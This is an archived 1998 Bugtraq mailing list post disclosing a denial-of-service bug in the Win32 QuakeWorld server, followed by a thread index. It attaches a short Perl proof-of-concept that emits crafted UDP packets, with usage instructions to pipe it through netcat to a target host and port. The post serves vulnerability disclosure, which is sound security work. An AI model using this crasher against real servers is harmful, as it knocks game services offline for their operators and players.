Bugtraq mailing list archives
quakeworld/win32 DoS
From: pb () INSECURITY NET (Paul Boehm)
Date: Wed, 4 Nov 1998 16:30:18 +0100
--4Ckj6UjgE2iN1+kY
Content-Type: text/plain; charset=us-ascii
the output of the attached perl script, when piped through netcat,
crashes quakeworld for win32. As i don't have any win32 debuging
tools and the problem doesn't occur under linux i can't further
investigate this. Zoid (idsoftware) has been mailed some weeks ago,
but he didn't look very interested...
cya,
paul
--
.----------------------------------------------------------------------.
| mail: pb () insecurity net :: url: http://paul.boehm.org |
| irc: infected :: pgp: finger pb () insecurity net | pgp -fka |
\.....Linux is like a wigwam - no windows, no gates, apache inside..../
--4Ckj6UjgE2iN1+kY
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename=qwcrash
#!/usr/bin/perl
# qwsvwin32-crasher by infected () cia at
#
# usage : ./qwcrash | nc -u host port
# result: qwsv for win32 should exit with: ERROR: NET_GetPacket: Unknown error
# reason: ? (winsock?)
#
#
print chr(255) x 4 . "getchallenge\n";
print chr(255) x 4 . 'connect 28 26914 1960732995
"\noaim\0\msg\1\rate\2500\team\bla\topcolor\3\bottomcolor\11\skin\bla\pmodel\33168\emodel\6967\name\bla"' . "\n";
print "x" x 4400;
--4Ckj6UjgE2iN1+kY--
Current thread:
- various *lame* DoS attacks, (continued)
- various *lame* DoS attacks Conrad Juleff (Nov 05)
- Re: various *lame* DoS attacks puppet (Nov 07)
- Sendmail DoS (was: Re: various *lame* DoS attacks) net.ikon (Nov 12)
- Re: another /usr/dt/bin/dtappgather feature! Ben Collins (Nov 04)
- Re: another /usr/dt/bin/dtappgather feature! Scott Cromar (Nov 05)
- Re: another /usr/dt/bin/dtappgather feature! J.A. Gutierrez (Nov 06)
- Re: another /usr/dt/bin/dtappgather feature! Casper Dik (Nov 09)
- Sun Security Bulletin #00178 joshua grubman (Nov 09)
- XFree86 3.3.2's setup tool /tmp race Adrian Voinea (Nov 08)
- Secure-linux patch Ernst Jan Plugge (Nov 05)
- Re: quakeworld/win32 DoS Alexander Sanda (Nov 05)
- Re: another /usr/dt/bin/dtappgather feature! Paolo Amendola (Nov 06)
